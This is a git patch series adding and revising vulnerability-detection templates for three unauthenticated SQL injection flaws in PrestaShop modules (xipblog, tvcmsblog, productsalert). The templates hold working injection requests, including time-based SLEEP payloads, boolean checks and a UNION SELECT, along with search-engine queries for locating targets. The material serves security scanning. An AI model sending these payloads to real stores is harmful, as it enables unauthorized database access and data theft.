From 6455bcf669b7686101c6a0aff95e208b9741a1b8 Mon Sep 17 00:00:00 2001 From: mastercho Date: Thu, 12 Sep 2024 11:55:38 +0300 Subject: [PATCH 01/11] Added CVEs --- http/cves/2023/CVE-2023-27847.yaml | 94 ++++++++++++++++++++++++++++++ http/cves/2023/CVE-2023-39650.yaml | 62 ++++++++++++++++++++ http/cves/2024/CVE-2024-36683.yaml | 73 +++++++++++++++++++++++ 3 files changed, 229 insertions(+) create mode 100644 http/cves/2023/CVE-2023-27847.yaml create mode 100644 http/cves/2023/CVE-2023-39650.yaml create mode 100644 http/cves/2024/CVE-2024-36683.yaml diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml new file mode 100644 index 0000000000..bcd3f14386 --- /dev/null +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -0,0 +1,94 @@ +id: CVE-2023-27847 + +info: + name: PrestaShop xipblog SQL Injection + author: mastercho + severity: critical + description: | + In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27847 + - https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-27847 + cwe-id: CWE-89 + epss-score: 0.04685 + epss-percentile: 0.91818 + metadata: + redirects: true + max-redirects: 3 + framework: prestashop + shodan-query: http.component:"Prestashop" + tags: cve,cve2023,prestashop,sqli,unauth,xipblog + + +flow: http(1) && http(2) + + +http: + - raw: + - | + @timeout: 20s + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + host-redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "xipblog")' + condition: and + internal: true + + - raw: + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562),NULL,NULL--+- HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + stop-at-first-match: true + host-redirects: true + matchers: + - type: dsl + name: time-based + dsl: + - 'duration_1>=5' + condition: and + + - type: dsl + name: blind-based + dsl: + - 'contains(body_2, "kr_blog_post_area")' + - '!contains(body_3, "kr_blog_post_area")' + condition: and + + - type: dsl + name: union-based + dsl: + - 'contains(body_4, "c8c605999f3d8352d7bb792cf3fdb25b")' + condition: and \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml new file mode 100644 index 0000000000..914e15d68f --- /dev/null +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -0,0 +1,62 @@ +id: CVE-2023-39650 + +info: + name: PrestaShop Theme Volty CMS Blog SQL Injection + author: mastercho + severity: critical + description: | + In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650 + - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-27847 + cwe-id: CWE-89 + epss-score: 0.04685 + epss-percentile: 0.91818 + metadata: + redirects: true + max-redirects: 3 + framework: prestashop + shodan-query: http.component:"Prestashop" + tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog + +http: + - raw: + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + host-redirects: true + matchers: + - type: dsl + name: time-based + dsl: + - 'duration_1>=5' + - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")' + condition: and + + - type: dsl + name: blind-based + dsl: + - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")' + - 'status_code_2 == 200 && status_code_3 == 302' + condition: and \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml new file mode 100644 index 0000000000..1d9e0f56fb --- /dev/null +++ b/http/cves/2024/CVE-2024-36683.yaml @@ -0,0 +1,73 @@ +id: CVE-2024-36683 + +info: + name: PrestaShop productsalert SQL Injection + author: mastercho + severity: critical + description: | + In the module “Products Alert” (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36683 + - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-36683 + cwe-id: CWE-89 + epss-score: 0.04685 + epss-percentile: 0.91818 + metadata: + redirects: true + max-redirects: 3 + framework: prestashop + shodan-query: http.component:"Prestashop" + tags: cve,cve2023,prestashop,sqli,unauth,productsalert + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "modules/productsalert")' + - 'contains(body, "module/productsalert")' + condition: or + internal: true + + - raw: + - | + @timeout: 20s + POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158 + - | + @timeout: 20s + POST /module/productsalert/AjaxProcess HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158 + + stop-at-first-match: true + host-redirects: true + matchers: + - type: dsl + name: time-based + dsl: + - 'duration_1>=5' + - 'duration_2>=5' + condition: or \ No newline at end of file From 0360e616e69316e47cb87fd6d6ec73529f39e17b Mon Sep 17 00:00:00 2001 From: mastercho Date: Thu, 12 Sep 2024 12:01:33 +0300 Subject: [PATCH 02/11] Fix lint --- http/cves/2023/CVE-2023-27847.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index bcd3f14386..09f5f868cb 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -45,7 +45,7 @@ http: - 'contains(body, "xipblog")' condition: and internal: true - + - raw: - | @timeout: 20s From 443c618c819e6d55c0b5837bd6606dca5ef40006 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Sep 2024 17:16:21 +0400 Subject: [PATCH 03/11] updated req & matcher --- http/cves/2023/CVE-2023-27847.yaml | 73 +++++------------------------- 1 file changed, 11 insertions(+), 62 deletions(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index 09f5f868cb..811e38d04d 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -1,7 +1,7 @@ id: CVE-2023-27847 info: - name: PrestaShop xipblog SQL Injection + name: PrestaShop xipblog - SQL Injection author: mastercho severity: critical description: | @@ -9,8 +9,8 @@ info: impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27847 - https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-27847 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -20,75 +20,24 @@ info: epss-percentile: 0.91818 metadata: redirects: true - max-redirects: 3 + max-redirects: 1 framework: prestashop shodan-query: http.component:"Prestashop" - tags: cve,cve2023,prestashop,sqli,unauth,xipblog - - -flow: http(1) && http(2) + fofa-query: app="Prestashop" + tags: cve,cve2023,prestashop,sqli,xipblog +variables: + num: "999999999" http: - raw: - | @timeout: 20s - GET / HTTP/1.1 + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - host-redirects: true - max-redirects: 3 - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "xipblog")' - condition: and - internal: true - - raw: - - | - @timeout: 20s - GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562),NULL,NULL--+- HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - stop-at-first-match: true host-redirects: true matchers: - - type: dsl - name: time-based - dsl: - - 'duration_1>=5' - condition: and - - - type: dsl - name: blind-based - dsl: - - 'contains(body_2, "kr_blog_post_area")' - - '!contains(body_3, "kr_blog_post_area")' - condition: and - - - type: dsl - name: union-based - dsl: - - 'contains(body_4, "c8c605999f3d8352d7bb792cf3fdb25b")' - condition: and \ No newline at end of file + - type: word + words: + - '{{md5({{num}})}}' From 8ed3453a2bceb96c01c6dfb2e6c8f6d3eb3102f9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Sep 2024 17:26:11 +0400 Subject: [PATCH 04/11] updated req. & matcher --- http/cves/2023/CVE-2023-39650.yaml | 42 ++++++++---------------------- 1 file changed, 11 insertions(+), 31 deletions(-) diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index 914e15d68f..9219364e6d 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -1,62 +1,42 @@ id: CVE-2023-39650 info: - name: PrestaShop Theme Volty CMS Blog SQL Injection + name: PrestaShop Theme Volty CMS Blog - SQL Injection author: mastercho severity: critical description: | - In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. + In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650 - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-39650 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2023-27847 + cve-id: CVE-2023-39650 cwe-id: CWE-89 epss-score: 0.04685 epss-percentile: 0.91818 metadata: - redirects: true - max-redirects: 3 + max-request: 1 + verified: true framework: prestashop - shodan-query: http.component:"Prestashop" - tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog + shodan-query: html:"/tvcmsblog" + tags: cve,cve2023,prestashop,sqli,tvcmsblog http: - raw: - | @timeout: 20s - GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1 + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(6)))oqFL)--+yxoW HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} host-redirects: true matchers: - type: dsl name: time-based dsl: - - 'duration_1>=5' - - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")' + - 'duration>=6' + - 'status_code == 200 && contains_all(tolower(response), "tvcmsblog", "prestashop")' condition: and - - - type: dsl - name: blind-based - dsl: - - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")' - - 'status_code_2 == 200 && status_code_3 == 302' - condition: and \ No newline at end of file From 0e4e0cf87b547327d7a8a0b973400623ca8866e3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Sep 2024 17:51:49 +0400 Subject: [PATCH 05/11] Update CVE-2023-27847.yaml --- http/cves/2023/CVE-2023-27847.yaml | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index 811e38d04d..df4f434dbe 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -19,10 +19,10 @@ info: epss-score: 0.04685 epss-percentile: 0.91818 metadata: - redirects: true - max-redirects: 1 + verified: true + max-request: 2 framework: prestashop - shodan-query: http.component:"Prestashop" + shodan-query: html:"/xipblog" fofa-query: app="Prestashop" tags: cve,cve2023,prestashop,sqli,xipblog @@ -36,8 +36,21 @@ http: GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1 Host: {{Hostname}} + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true host-redirects: true matchers: - type: word + part: body_1 words: - '{{md5({{num}})}}' + + - type: dsl + dsl: + - 'duration_2>=6' + - 'contains_all(tolower(response), "prestashop", "xipblog")' + condition: and From 22c1cc999148b8e8c656f09499d268e56bd31407 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Sep 2024 18:06:50 +0400 Subject: [PATCH 06/11] Update CVE-2024-36683.yaml --- http/cves/2024/CVE-2024-36683.yaml | 46 +++++++++--------------------- 1 file changed, 14 insertions(+), 32 deletions(-) diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml index 1d9e0f56fb..b0699514ed 100644 --- a/http/cves/2024/CVE-2024-36683.yaml +++ b/http/cves/2024/CVE-2024-36683.yaml @@ -1,16 +1,16 @@ id: CVE-2024-36683 info: - name: PrestaShop productsalert SQL Injection + name: PrestaShop productsalert - SQL Injection author: mastercho severity: critical description: | - In the module “Products Alert” (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions. + In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36683 - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html + - https://nvd.nist.gov/vuln/detail/CVE-2024-36683 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -19,45 +19,27 @@ info: epss-score: 0.04685 epss-percentile: 0.91818 metadata: - redirects: true - max-redirects: 3 + verified: true + max-request: 2 framework: prestashop - shodan-query: http.component:"Prestashop" - tags: cve,cve2023,prestashop,sqli,unauth,productsalert - -flow: http(1) && http(2) + shodan-query: html:"/productsalert" + fofa-query: body="/productsalert" + tags: cve,cve2023,prestashop,sqli,productsalert http: - raw: - | - GET / HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 3 - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "modules/productsalert")' - - 'contains(body, "module/productsalert")' - condition: or - internal: true - - - raw: - - | - @timeout: 20s + @timeout: 30s POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158 + - | - @timeout: 20s + @timeout: 30s POST /module/productsalert/AjaxProcess HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158 @@ -68,6 +50,6 @@ http: - type: dsl name: time-based dsl: - - 'duration_1>=5' - - 'duration_2>=5' - condition: or \ No newline at end of file + - 'duration_1>=5 || duration_2>=5' + - 'contains_all(tolower(response), "productsalert", "prestashop")' + condition: and From 2809ff8f3972d353c9a60db6272df69a1d0f918e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Sep 2024 13:02:24 +0530 Subject: [PATCH 07/11] remove xipblog matcher --- http/cves/2023/CVE-2023-27847.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index df4f434dbe..a2c668f5fc 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -52,5 +52,5 @@ http: - type: dsl dsl: - 'duration_2>=6' - - 'contains_all(tolower(response), "prestashop", "xipblog")' + - 'contains_all(tolower(response), "prestashop")' condition: and From 862eef161fa549fc404f47417e313c7af64a4b19 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Sep 2024 19:08:59 +0400 Subject: [PATCH 08/11] fixed cve-2023-27847 --- http/cves/2023/CVE-2023-27847.yaml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index a2c668f5fc..13b6017128 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -26,10 +26,23 @@ info: fofa-query: app="Prestashop" tags: cve,cve2023,prestashop,sqli,xipblog +flow: http(1) && http(2) + variables: num: "999999999" http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_any(tolower(response), "prestashop", "xipblog")' + internal: true + - raw: - | @timeout: 20s @@ -45,12 +58,12 @@ http: host-redirects: true matchers: - type: word + name: union-based part: body_1 words: - '{{md5({{num}})}}' - type: dsl + name: time-based dsl: - 'duration_2>=6' - - 'contains_all(tolower(response), "prestashop")' - condition: and From f5f00358a1c6f0002b878282d9b1b9f3ca71c6c5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Sep 2024 12:12:01 +0400 Subject: [PATCH 09/11] Update CVE-2023-39650.yaml --- http/cves/2023/CVE-2023-39650.yaml | 53 +++++++++++++----------------- 1 file changed, 23 insertions(+), 30 deletions(-) diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index 9219364e6d..c6f686962e 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -1,42 +1,35 @@ -id: CVE-2023-39650 - -info: - name: PrestaShop Theme Volty CMS Blog - SQL Injection - author: mastercho - severity: critical - description: | - In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. - reference: - - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html - - https://nvd.nist.gov/vuln/detail/CVE-2023-39650 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-39650 - cwe-id: CWE-89 - epss-score: 0.04685 - epss-percentile: 0.91818 - metadata: - max-request: 1 - verified: true - framework: prestashop - shodan-query: html:"/tvcmsblog" - tags: cve,cve2023,prestashop,sqli,tvcmsblog - http: - raw: - | @timeout: 20s - GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(6)))oqFL)--+yxoW HTTP/1.1 + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1 Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} host-redirects: true matchers: - type: dsl name: time-based dsl: - - 'duration>=6' - - 'status_code == 200 && contains_all(tolower(response), "tvcmsblog", "prestashop")' + - 'duration_1>=5' + - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")' + condition: and + + - type: dsl + name: blind-based + dsl: + - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")' + - 'status_code_2 == 200 && status_code_3 == 302' condition: and From 54817fd3fc4a232eca7e6ccff1a998e733b34efb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Sep 2024 12:20:28 +0400 Subject: [PATCH 10/11] Update CVE-2024-36683.yaml --- http/cves/2024/CVE-2024-36683.yaml | 22 +++++++++++++++++++--- 1 file changed, 19 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml index b0699514ed..c0134d65e5 100644 --- a/http/cves/2024/CVE-2024-36683.yaml +++ b/http/cves/2024/CVE-2024-36683.yaml @@ -26,7 +26,24 @@ info: fofa-query: body="/productsalert" tags: cve,cve2023,prestashop,sqli,productsalert +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(tolower(body), "productsalert", "prestashop")' + condition: and + internal: true + - raw: - | @timeout: 30s @@ -50,6 +67,5 @@ http: - type: dsl name: time-based dsl: - - 'duration_1>=5 || duration_2>=5' - - 'contains_all(tolower(response), "productsalert", "prestashop")' - condition: and + - 'duration_1>=5' + - 'duration_2>=5' From f42e20e723a968bad66095e3d099550763afd34c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Sep 2024 12:22:48 +0400 Subject: [PATCH 11/11] Update CVE-2023-39650.yaml --- http/cves/2023/CVE-2023-39650.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index c6f686962e..c2161a9f50 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -1,3 +1,30 @@ +id: CVE-2023-39650 + +info: + name: PrestaShop Theme Volty CMS Blog - SQL Injection + author: mastercho + severity: critical + description: | + In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + reference: + - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-39650 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-39650 + cwe-id: CWE-89 + epss-score: 0.04685 + epss-percentile: 0.91818 + metadata: + max-request: 1 + verified: true + framework: prestashop + shodan-query: html:"/tvcmsblog" + tags: cve,cve2023,prestashop,sqli,tvcmsblog + http: - raw: - |